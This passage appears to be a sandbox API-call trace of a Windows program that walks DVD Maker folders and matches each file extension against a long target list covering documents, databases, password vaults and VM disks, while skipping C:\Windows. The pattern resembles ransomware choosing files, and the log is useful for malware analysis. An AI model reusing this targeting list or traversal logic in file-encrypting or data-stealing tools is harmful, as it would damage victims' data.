(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.221] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.226] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 0x0 [0040.226] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*" [0040.226] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.227] PathFindExtensionW (pszPath="16_9-frame-background.png") returned=".png" [0040.227] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.228] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.228] PathFindExtensionW (pszPath="16_9-frame-highlight.png") returned=".png" [0040.228] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.228] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.228] PathFindExtensionW (pszPath="16_9-frame-image-mask.png") returned=".png" [0040.228] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.228] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.228] PathFindExtensionW (pszPath="16_9-frame-overlay.png") returned=".png" [0040.228] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.228] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.228] PathFindExtensionW (pszPath="background.png") returned=".png" [0040.228] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.228] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.229] PathFindExtensionW (pszPath="btn-back-static.png") returned=".png" [0040.229] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.229] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.229] PathFindExtensionW (pszPath="btn-next-static.png") returned=".png" [0040.229] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.229] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.229] PathFindExtensionW (pszPath="btn-previous-static.png") returned=".png" [0040.229] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.229] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.229] PathFindExtensionW (pszPath="button-highlight.png") returned=".png" [0040.229] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.229] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.229] PathFindExtensionW (pszPath="button-overlay.png") returned=".png" [0040.229] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.230] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.230] PathFindExtensionW (pszPath="Memories_buttonClear.png") returned=".png" [0040.230] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.230] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.230] PathFindExtensionW (pszPath="Notes_btn-back-static.png") returned=".png" [0040.230] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.230] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.230] PathFindExtensionW (pszPath="Notes_content-background.png") returned=".png" [0040.230] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.230] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.230] PathFindExtensionW (pszPath="scrapbook.png") returned=".png" [0040.230] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.230] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.230] PathFindExtensionW (pszPath="Title_content-background.png") returned=".png" [0040.231] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.231] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.231] PathFindExtensionW (pszPath="Title_mainImage-mask.png") returned=".png" [0040.231] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.231] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.231] PathFindExtensionW (pszPath="Title_select-highlight.png") returned=".png" [0040.231] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.231] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.231] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.232] PathFindExtensionW (pszPath="menu_style_default_Thumbnail.png") returned=".png" [0040.232] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.232] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.232] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0040.232] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.232] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.232] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0040.232] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.232] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.232] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0040.233] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.233] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.233] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0040.233] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.233] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.233] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0040.233] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.233] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.233] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0040.233] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.233] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.233] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 0x0 [0040.233] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*" [0040.233] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.235] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0040.235] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.235] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.235] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0040.235] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.235] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.236] PathFindExtensionW (pszPath="decorative_rule.png") returned=".png" [0040.236] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.236] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.236] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0040.236] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.236] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.236] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0040.236] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.236] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.236] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0040.236] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.236] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.236] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0040.236] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.236] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.237] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0040.237] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.237] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.237] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0040.237] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.237] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.237] PathFindExtensionW (pszPath="vintage.png") returned=".png" [0040.237] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.237] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.237] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.238] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 0x0 [0040.238] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*" [0040.238] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.241] PathFindExtensionW (pszPath="720x480blacksquare.png") returned=".png" [0040.241] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.241] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.242] PathFindExtensionW (pszPath="NextMenuButtonIcon.png") returned=".png" [0040.242] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.242] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.242] PathFindExtensionW (pszPath="NextMenuButtonIconSubpictur.png") returned=".png" [0040.242] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.242] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.242] PathFindExtensionW (pszPath="Notes_loop.wmv") returned=".wmv" [0040.242] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.242] StrStrIW 